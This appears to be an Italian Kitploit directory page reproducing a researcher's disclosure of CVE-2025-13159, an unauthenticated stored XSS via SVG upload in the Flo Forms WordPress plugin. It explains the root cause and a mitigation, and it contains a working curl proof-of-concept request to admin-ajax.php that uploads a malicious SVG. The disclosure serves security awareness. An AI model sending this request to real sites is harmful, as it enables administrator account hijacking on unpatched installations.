Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Flo-Forms-CVE-Report — Disclosure for CVE-2025-13159 | Kitploit
Strumenti/GitHubGitHub/mooseloveti/flo-forms-cve-report
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubmooseloveti/flo-forms-cve-report

Flo-Forms-CVE-Report

Disclosure for CVE-2025-13159

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Flo-Forms-CVE-Report

Divulgazione per CVE-2025-13159

CVE-2025-13159 - Vulnerabilità in Flo Forms – Easy Drag & Drop Form Builder

Questo repository divulga una vulnerabilità scoperta in Flo Forms – Easy Drag & Drop Form Builder <= 1.0.43, plugin WordPress sviluppato da flothemesplugins.

🛠 Versione interessata

  • Prodotto: Flo Forms – Easy Drag & Drop Form Builder
  • Versione: v1.0.43
  • URL: https://wordpress.org/plugins/flo-forms/

🔒 CVE assegnata

CVE IDTipoComponenteImpatto
CVE-2025-13159Cross-Site Scripting memorizzato non autenticato tramite caricamento SVGpublic/class-flo-forms-public.phpUn attaccante non autenticato può eseguire JS

🧾 Descrizione dettagliata

CVE-2025-13159 — Cross-Site Scripting memorizzato non autenticato tramite caricamento SVG

  • Componente interessato: pagina di amministrazione di Flo Forms
  • Vettore d'attacco: Cross-Site Scripting memorizzato non autenticato tramite caricamento SVG
  • Attivazione: Un attaccante può iniettare script malevoli nell'interfaccia di amministrazione sfruttando flo_form_submit per memorizzare script arbitrari tramite caricamento SVG.
root@kitploit:~
curl -k -X POST "https://localhost:8080/wp-admin/admin-ajax.php" \
  -F 'action=flo_form_submit' \
  -F 'flo_fid=<your fid>' \
  -F 'flo-form-model={}' \
  -F 'flo-form-schema={"groups":[]}' \
  -F '[email protected];type=image/svg+xml'

※Se il fid all'interno dell'oggetto non esiste, la richiesta fallirà.

  • Impatto: Gli script memorizzati possono essere eseguiti, comportando il rischio di danni gravi come il dirottamento dell'account.

❓Motivo della vulnerabilità

Il plugin estende i tipi MIME consentiti da WordPress per includere image/svg+xml ed espone un'azione AJAX non autenticata (flo_form_submit) che accetta allegati e li passa a media_handle_upload() senza alcuna sanificazione SVG né controllo delle autorizzazioni. Gli SVG caricati vengono poi serviti come image/svg+xml e collegati dall'interfaccia di amministrazione. Quando un amministratore apre l'allegato (direttamente o tramite /), il browser interpreta il documento SVG ed esegue gli script incorporati, causando XSS memorizzato.

  • Escludere SVG dai tipi MIME consentiti.

Nota personale

È passato un mese, ma la patch non è ancora stata pubblicata e il download stesso è stato sospeso. Questa volta la riproduzione della PoC non riusciva facilmente e sono rimasto bloccato per più di un'ora, ma alla fine si è scoperto che avevo dimenticato di mettere il simbolo (@) prima di XSS.svg.

🔍 Scopritore

Nome: MooseLove
Ruolo: Ricercatore di sicurezza indipendente / bug hunter
Contatto: Disponibile su richiesta


📚 Riferimenti

  • Prodotto: https://wordpress.org/plugins/flo-forms/

⚠️ Licenza

Questa segnalazione è fornita per la sensibilizzazione sulla sicurezza pubblica. Diffusione libera con attribuzione.

Scarica lo strumento